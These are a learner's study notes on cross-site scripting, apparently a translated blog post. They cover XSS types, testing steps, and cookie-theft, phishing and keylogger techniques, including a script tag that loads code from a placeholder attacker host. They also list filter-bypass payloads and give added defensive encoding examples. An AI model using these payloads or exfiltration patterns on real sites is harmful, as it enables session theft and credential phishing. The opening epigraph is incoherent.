XSS vulnerability

I need love in my heart, others just made me remember the share already exist in the heart of love, to love a person like a tank containing water, the water extent that you love yourself, my love are you with me because I look like you, that you put me aroused you make me better, but only if I love myself

 

The truth is not important, the result is what is most important. Sibu Si is none other than the final say, would be willing to look at yourself. ----- Grand Shanghai 2012

 

Cross-site scripting (XSS) vulnerability overview:

Types of cross-site scripting vulnerability and the testing process:

1. Find an input point on the target site, such as a query (search) interface or a message board;

2. Enter a special character plus a unique identifying string, submit it, and view the source of the returned page to see whether the input is echoed back and, if so, whether it has been filtered;

3. Search the page source for the unique string; from the markup immediately before and after it, work out whether the surrounding syntax can be closed so that the input lands in a context where JS would execute (constructing the closing);

4. Submit a constructed script payload (trying the various bypass techniques as needed) and see whether it executes; if it does, the XSS vulnerability is confirmed.
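Steps 2 and 3 above are done by hand in the notes; as an added example (not code from the original post), the function below automates the reading of the response: it looks for the unique marker, reports whether the special characters submitted in front of it survived unencoded, and works out which output context (HTML text, attribute value, or inside a script block) the probe landed in. The probe value and the three response bodies are constructed for this example.

```javascript
// Added example, not code from the original post: classify how a unique probe
// value is echoed back in a page, which is what steps 2 and 3 above check by hand.
// The probe value and the three sample response bodies are constructed.

const PROBE_SPECIALS = '"<>\'';      // characters whose treatment we want to observe
const PROBE_MARKER = 'zz7q1x';        // unique, easy-to-search marker
const PROBE = PROBE_SPECIALS + PROBE_MARKER;

// Trailing run of the probe's special characters, raw or entity-encoded.
const TRAILING_SPECIALS = /(?:&quot;|&#0?34;|&lt;|&gt;|&#0?39;|&apos;|["<>'])+$/;

// Result: echoed (marker found), specialsIntact (the special characters survived
// unencoded right before the marker) and the output context the marker sits in.
function classifyReflection(body, marker = PROBE_MARKER) {
  const idx = body.indexOf(marker);
  if (idx === -1) return { echoed: false, specialsIntact: false, context: 'none' };
  const upToMarker = body.slice(0, idx);
  const specialsIntact = upToMarker.endsWith(PROBE_SPECIALS);
  // Look at what precedes the probe itself to decide where it landed.
  const prefix = upToMarker.replace(TRAILING_SPECIALS, '');
  let context = 'html-text';
  if (prefix.lastIndexOf('<script') > prefix.lastIndexOf('</script')) {
    context = 'script';
  } else if (/<[a-zA-Z][^<>]*=\s*["']?[^<>"']*$/.test(prefix)) {
    context = 'attribute';
  }
  return { echoed: true, specialsIntact, context };
}

// One-line verdict for the tester's notes.
function describe(result) {
  if (!result.echoed) return 'not reflected';
  if (!result.specialsIntact) {
    return `reflected in ${result.context} context; special characters encoded or removed`;
  }
  return `reflected unencoded in ${result.context} context: output is not escaped for this context`;
}

// Constructed sample responses to the probe, one per outcome.
const SAMPLE_ENCODED = '<p>Results for: &quot;&lt;&gt;&#039;zz7q1x</p>';
const SAMPLE_RAW_ATTR = '<input type="text" name="q" value=""<>\'zz7q1x">';
const SAMPLE_RAW_SCRIPT = '<script>var q = \'"<>\'zz7q1x\';</script>';

for (const body of [SAMPLE_ENCODED, SAMPLE_RAW_ATTR, SAMPLE_RAW_SCRIPT]) {
  console.log(describe(classifyReflection(body)));
}
```

The context matters for the fix as much as for the test: a value that is echoed unencoded inside an attribute or a script block needs the escaping appropriate to that context, not just HTML entity encoding.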

 

TIPS:

1. Query interfaces are typically prone to reflected XSS; message boards are prone to stored XSS;

2. The back end may have filtering measures, so a constructed JS payload may be filtered out and fail; the execution environment (the browser) may also limit it;

3. Try different variations of the script to bypass the back-end filtering mechanism;

 

Principle of reflected XSS (GET & POST), analysis:

Start with reflected XSS (GET): a pop-up demonstrates the XSS vulnerability. If the form limits the input length, the length restriction can sometimes be removed by editing the element in the browser's F12 developer tools; GET-type XSS is relatively easy to exploit.

 

Stored XSS principle, analysis:

Stored XSS is saved to the database, whereas reflected XSS is not stored; the hazard is greater because the payload persists in the database or a configuration file;

 

 

DOM-based XSS principle, analysis:

DOM XSS is a pure front-end operation: in one variant the input is taken from a form field, in the other it is taken from the URL;

  XSS hazard - obtaining the cookie, principle

    GET and POST; how the cookie is obtained: the attacker sets up a platform to collect the cookies sent by the XSS payload;

    GET-type XSS exploitation: get the cookie; GET-type parameters are inside the URL

    1. The user visits the XSS page and triggers the script; the server returns a page carrying the malicious JS

    2. The user's browser executes the script, and the stolen cookie data is sent back to the attacker

    3. The attacker logs in as the user with the stolen cookie and causes damage

    POST-type XSS exploitation:

    1. A crafted page makes the request and triggers the form

    2. JS on that page automatically POSTs the form data, triggering the XSS

    3. After the JS executes, the cookie is stolen. Once the user visits our form page, the attack is complete: the form carries the malicious code (document.cookie) that reads the user's cookie; the form's target is the page with the POST XSS vulnerability, the submitted field holds the malicious JS, and that JS sends the cookie obtained through the XSS back to the attacker. In other words, exploiting a POST XSS means setting up a page whose form submits itself automatically and getting the user to visit it;

 

  XSS hazard - XSS phishing principle

    Write a JS file and load it through a script src on the XSS page; the page then pops up a dialog saying the user must log in to view it, and the fake login form in that code just saves the username and password the user enters;

    <script src="http://ip/xxx/xxx/xxx/xxx.html"></script>

    

  XSS hazard - keylogger principle

    Cross-origin: a different port, subdomain or protocol all make a request cross-origin;

    Cross-origin and the same-origin policy: for security reasons, all browsers agree on the same-origin policy, which states that JS cannot operate across two different origins; for example, JS under the x.com domain cannot access objects in the y.com domain;

    If cross-origin access is needed, the administrator has to configure it explicitly;

    Tips: the following tags load cross-origin resources and are not restricted by the same-origin policy.

    <script src="">   // JS

    <img src="">      // images

    <link href="">    // CSS

    <iframe src="">   // any resource

    If there were no same-origin policy, an attacker could send the user a malicious link to a site B (www.steal-your-cookie.com, say) with a lot of JS embedded in it, and that JS could read the user's Taobao cookie directly. Unlike other vulnerabilities, a single piece of JS would then be enough to read the cookie, and the front end would be in chaos; that is why every browser implements the same-origin policy;

    The keylogger uses event.keyCode to read the key the user pressed and then sends it to the back end with an asynchronous POST request;

    Ajax by default cannot cross origins;

    On the receiving side, adding header("Access-Control-Allow-Origin: *"); is enough to allow it;
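The notes above explain the same-origin policy and then show the blanket header("Access-Control-Allow-Origin: *") that switches cross-origin reads back on for everyone. As an added example (not code from the original post), the block below shows the defender's side: an exact origin comparison that treats a different scheme, host or port as cross-origin, and a per-request allowlist that only reflects origins the site actually trusts. The allowlist entries and the sample Origin values are constructed for this example.

```javascript
// Added example, not code from the original post: same-origin comparison and a CORS
// allowlist, as the safer alternative to "Access-Control-Allow-Origin: *".
// The allowlist entries and sample origins are constructed for this example.

// Two URLs are same-origin only when scheme, host and port all match; the URL
// parser normalises default ports to "", so https://x.com and https://x.com:443 agree.
function isSameOrigin(a, b) {
  const ua = new URL(a);
  const ub = new URL(b);
  return ua.protocol === ub.protocol && ua.hostname === ub.hostname && ua.port === ub.port;
}

// Hypothetical first-party front ends that are allowed to read API responses.
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://admin.example.com',
]);

// Returns the response headers to add for a given request Origin header value.
// The comparison is an exact string match, so a subdomain, another port or plain
// http (all cross-origin, as the notes say) gets no CORS headers at all.
function corsHeadersFor(origin, allowlist = ALLOWED_ORIGINS) {
  if (typeof origin !== 'string' || !allowlist.has(origin)) {
    return {}; // no CORS headers: the browser refuses the cross-origin read
  }
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    // Caches must key the response on Origin, since the header value varies.
    'Vary': 'Origin',
  };
}

// The blanket setting from the notes, for comparison: every origin may read the
// response. Browsers refuse to expose a "*" response to a request that carries
// cookies, so this is only usable for public, unauthenticated resources.
function blanketCorsHeaders() {
  return { 'Access-Control-Allow-Origin': '*' };
}

// Constructed Origin values as they would arrive in a request header.
const SAMPLE_ORIGINS = ['https://app.example.com', 'https://evil.example.net', undefined];
for (const o of SAMPLE_ORIGINS) {
  console.log(String(o), '->', JSON.stringify(corsHeadersFor(o)));
}
```

A server that echoes whatever Origin it receives, or that uses `*`, gives up the protection the same-origin policy provides; an allowlist keeps the decision on the server, where it can be reviewed.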

  

    XSS blind attack (blind XSS) principle:

      Blind XSS is a common scenario: the input is not displayed on the front end but is saved and rendered in the back-end (admin) area; if the input contains code that reads the cookie, the administrator's cookie is obtained when they log in to the admin area;

      Remaining topics in these notes:

      XSS filtering and bypass

      XSS output points in href and JS: analysis

      XSS common precautions

 

OWASP (search on Baidu) has some relevant learning material;

 

XSS is a vulnerability in the web front end, so the target of the harm is mainly the front-end user.

XSS vulnerabilities can be used for phishing attacks, front-end JS mining, and harvesting user cookies; combined with a vulnerability in the browser itself they may even give remote control over the user's machine;

XSS attack process, roughly: omitted

 

Common types of cross-site scripting vulnerability, by hazard: stored > reflected > DOM-based

Reflected: the interactive data is generally not stored in a database; it is one-off and what you see is what you get; usually found in query pages and the like;

Stored: the interactive data is stored in a database, so it persists; usually found in message boards and registration pages;

DOM-based: no data is exchanged with the back-end server; the problem arises when front-end code takes its output from a DOM operation; like reflected XSS, it is one-off;

 

XSS vulnerabilities arise mainly because the program's control over input and output is not strict enough: a well-constructed script is accepted as input, and when it is output the front-end browser parses it as valid code and executes it, causing harm;

 

XSS bypass - filtering - transformation

1. Front-end restrictions: bypass by capturing and replaying the request, or by editing the front-end HTML;

2. Case variation, e.g.: <SCRIPT>aLeRT(111)</sCRIpt>

3. Splicing: <scri<script>pt>alert(111)</scri<script>pt>

4. Comment interference: <scri<!--test-->pt>alert(111)</scr<!--test-->ipt>

XSS bypass - filtering - encoding

The back end filters special characters such as the <script> tag; when the tag is written in one of various encodings the back-end filter may not catch it, while the browser recognises the encoding, translates it back into a normal tag and executes it;

Note when encoding: check whether the encoding used will be recognised and decoded correctly at the output point;

Can alert('xss') be delivered URL-encoded?

alert%28%27xss%27%29 does not execute, because the attribute does not decode these codes back into a normal tag;

But HTML entity encoding of it does work;

There are many ways to bypass XSS filters, depending on one's ideas and command of front-end technology;

<ScRipT>alert(111)</ScRipT>

<img src=x onerror="alert(aaa)">

XSS is quite flexible; it mainly depends on one's own flair;

 

XSS --- htmlspecialchars is a PHP function; by default it does not filter (escape) the single quote ';

 

XSS common precautions: filter input and escape output;

 For example, for a phone number input: filter, so that only digits in phone-number format are allowed;

Escape: all data output to the front end is escaped according to its output point; for example, output into HTML gets HTML entity escaping, and output into JS gets JS escaping;

 

 XSS in href: an a tag's href can output javascript:alert(111); since href is normally a hyperlink, only allow http and https at that output point;

 

XSS in JS: how to construct a closing for the variable in front

<script>

  $dd='x'</script><script>alert('xss')</script>

A </script> is added in the middle to close the preceding <script>

If HTML entity encoding is used, the XSS problem is solved, but the entities are not decoded inside JS, so at a JS output point the special characters should instead be escaped with \;
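The bypass section lists payloads that walk past simple blacklists, and the precautions section says the fix is escaping by output context. As an added example (not code from the original post or from PHP), the block below puts both side by side: three blacklist filters of the kind those payloads defeat, and encoders for the HTML, JS-string and href contexts that neutralise every payload on this page, including the `$dd='x'` closing trick. The payloads are the ones quoted in the notes; the filter functions, encoders and render helpers are constructed for this example, and `encodeForHtml` mirrors what PHP's htmlspecialchars does rather than calling it.

```javascript
// Added example, not code from the original post: blacklist filters of the kind the
// bypass payloads above defeat, beside context-specific output encoding as the
// precautions section recommends. Payloads are quoted from the notes; the filter,
// encoder and render functions are constructed for this example.

const PAYLOADS = {
  caseMix: '<SCRIPT>aLeRT(111)</sCRIpt>',
  nested: '<scri<script>pt>alert(111)</scri<script>pt>',
  comment: '<scri<!--test-->pt>alert(111)</scr<!--test-->ipt>',
  imgOnerror: '<img src=x onerror="alert(aaa)">',
  jsString: "x'</script><script>alert('xss')</script>",
};

// Filter 1: remove the literal lowercase tag. Case variation walks past it.
function stripScriptExact(s) { return s.replace(/<script>/g, ''); }

// Filter 2: case-insensitive, but a single pass: removing the inner tag of the
// nested payload reassembles an outer <script> tag.
function stripScriptOnce(s) { return s.replace(/<script>/gi, ''); }

// Filter 3: filter 2 followed by a comment clean-up step. The comment-split
// payload only turns into <script> after the tag check has already run, and
// nothing here looks at event-handler attributes such as onerror at all.
function stripScriptThenComments(s) {
  return stripScriptOnce(s).replace(/<!--[\s\S]*?-->/g, '');
}

// Heuristic used by the checks below: does the output still contain a script
// tag, or a tag carrying an on* event-handler attribute?
function looksExecutable(s) {
  return /<script\b/i.test(s) || /<[a-z][^<>]*\bon[a-z]+\s*=/i.test(s);
}

// HTML context: encode every character that can open markup or end an attribute.
// PHP's htmlspecialchars() does the same, but by default (ENT_COMPAT) leaves the
// single quote alone; singleQuote:false reproduces that default.
function encodeForHtml(s, { singleQuote = true } = {}) {
  return String(s).replace(/[&<>"']/g, c => {
    if (c === "'") return singleQuote ? '&#039;' : c;
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' }[c];
  });
}

// JS string context: backslash-escape as \uXXXX, so the value can neither end the
// string literal nor contain a literal </script> that ends the script block.
// HTML entities would be wrong here: the JS engine does not decode them.
function encodeForJsString(s) {
  return String(s).replace(/[\\'"<>\/\n\r\u2028\u2029]/g, c =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// href context: accept only absolute http(s) URLs; javascript: and anything
// unparseable become a harmless "#".
function safeHref(value) {
  try {
    const u = new URL(String(value));
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : '#';
  } catch {
    return '#';
  }
}

// Output points that apply the encoder for their own context.
function renderSearchResult(query) {
  return `<p>Results for: ${encodeForHtml(query)}</p>`;
}
function renderInlineScript(value) {
  return `<script>var dd='${encodeForJsString(value)}';</script>`;
}
function renderLink(url, text) {
  return `<a href="${encodeForHtml(safeHref(url))}">${encodeForHtml(text)}</a>`;
}

for (const [name, p] of Object.entries(PAYLOADS)) {
  console.log(name, 'after filter 3:', looksExecutable(stripScriptThenComments(p)),
    '| HTML-encoded:', looksExecutable(encodeForHtml(p)));
}
```

Each blacklist fails on the very next payload in the list, while the encoders do not need to know which payload is coming: they only have to be matched to the output context, which is why the precautions section ties escaping to the output point rather than to the input.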

 

 

Written while studying; it is a mess; it feels a bit hard to understand; come back and review it later;

 


Source: www.cnblogs.com/H-hy/p/11531086.html